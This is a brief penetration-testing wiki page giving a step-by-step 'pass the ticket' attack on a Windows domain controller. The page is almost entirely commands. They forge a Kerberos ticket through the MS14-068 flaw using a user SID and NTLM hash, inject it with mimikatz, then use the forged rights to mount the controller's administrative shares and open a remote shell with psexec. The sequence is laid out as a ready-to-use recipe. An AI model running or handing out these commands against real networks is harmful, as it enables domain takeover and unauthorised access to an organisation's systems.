PTT: Pass the ticket

From pentestwiki.org
  1. Attack is against DC with a valid user/ntlm hash
whoami /user
python ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc --rc4 <ntlmHash>
python ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> --rc4 <ntmlHash>
klist
klist purge
mimikatz.exe "kerberos::ptc [email protected]" exit` # Generated file must be injected into memory
klist
net use \\controlador.dominio.net\admin$
net use k:  \\controlador.dominio.net\c$
psexec  \\controlador.dominio.net\ cmd.exe
whoami /groups